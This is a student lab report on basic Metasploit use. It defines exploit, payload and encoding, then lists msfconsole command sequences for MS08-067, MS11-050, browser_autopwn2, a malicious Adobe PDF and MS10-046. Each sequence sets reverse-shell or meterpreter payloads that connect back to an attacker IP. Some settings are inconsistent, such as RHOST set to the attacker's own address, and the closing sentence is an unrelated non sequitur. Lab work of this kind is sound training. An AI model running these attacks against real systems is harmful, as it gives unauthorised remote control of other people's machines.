Exp5: MSF Basic Application

1. Answers to basic questions

(1) Explain what exploit, payload and encode are in your own words.

Exploit: uses a vulnerability to secretly open a channel, which is equivalent to setting up a pipeline, and through that pipeline smoothly delivers the prepared Trojan to the target machine.

Payload: simply put, the malicious code packaged into an executable file or into a specified format; it is delivered through the pipeline and then runs to give us control of the target machine.

Encode: encoding the payload wraps and disguises it, changing the payload's code characteristics (its recognisable signature) without changing what the payload does for us.

2. Practical process

  • 1. Windows Service Penetration Attack - MS08-067 Security Vulnerability
    • Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

    msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > show payloads

    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp    // tcp reverse connection

    msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161    // attack machine ip

    msf exploit(ms08_067_netapi) > set LPORT 5213    // attack port

    msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161    // target machine ip; the vulnerable port is already fixed

    msf exploit(ms08_067_netapi) > set target 0    // automatically select the target system type; the match rate is high

    msf exploit(ms08_067_netapi) > exploit    // attack

    • At this time, the firewall of the target machine needs to be turned off, otherwise the attack fails with ConnectionTimeOut;

    • Result after a successful attack:

  • 2. Browser Penetration Attack - MS11-050

    • Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http    // http reverse connection

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161    // attack machine ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213    // fixed attack port

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm    // uniform resource identifier (URI) path setting

    msf exploit(ms11_050_cobjectelement) > exploit

  • If the test fails, an IE browser error always appears. I think the problem is that the browser version is wrong and does not match the vulnerability. If so, change the vulnerability; the following uses a method that automatically selects the exploit according to the browser version.
    • Using the browser_autopwn module
      • Now enter msfconsole on the attack machine, and then enter:

        use auxiliary/server/browser_autopwn2

        set SRVHOST 192.168.43.161

        set URIPATH auto

        show options

      • Start the attack; you can see that msf keeps trying different payloads.
      • The attempt succeeds: the accessible URL http://192.168.43.161:8080/auto is output and the server is started;

      • After entering the URL in the target machine's browser, the browser is redirected to http://192.168.43.161:8080/auto/FaOGspto

      • Looking back at the kali machine, I found that the connection was successful, and I entered sessions -i 2 to get the session. At this point, control of the target machine has been obtained.

  • 3. Infiltration attack against Adobe Reader software - adobe_toolbutton

    • Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp    // tcp reverse connection

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161    // attack machine ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213    // attack port

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf    // name of the generated pdf file

    msf exploit(adobe_cooltype_sing) > exploit    // attack

    • Copy the generated pdf file to the target machine.

    • Enter back on kali to exit the current module, then enter the listener (handler) module with the following commands:

    msf > use exploit/multi/handler    // enter the listener module

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp    // tcp reverse connection

    msf exploit(handler) > set LHOST 192.168.43.161    // attack machine ip

    msf exploit(handler) > set LPORT 5213    // fixed attack port

    msf exploit(handler) > exploit

    • Open the 5213lzm.pdf file on the target machine:
    • The attack machine shows that the attack succeeded:
  • 4. Shortcut Icon Vulnerability - MS10-046
    • Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

      msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

      msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48    // attack machine ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp    // tcp reverse connection

      msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48    // attack machine ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > exploit    // attack

    • At this point, a directory listing at the attacker's IP pops up, containing a "shortcut" icon:
    • For the session that has been established, view it with the sessions command and select it with sessions -i 1 to gain control of the target machine.

      (PS) The time span of this test was a bit large, and I couldn't finish it in one go. The fourth task was done after the end of ciscn. By then my kali machine had been messed up, so I used someone else's virtual machine to finish; the IP here is not the previous one.

3. Summary and experience of practice

This test left me with the deepest impression of the power of msf. Using msf really helps a lot in penetration testing or attack-oriented work. A pair of research glasses is snooping on your laptop.
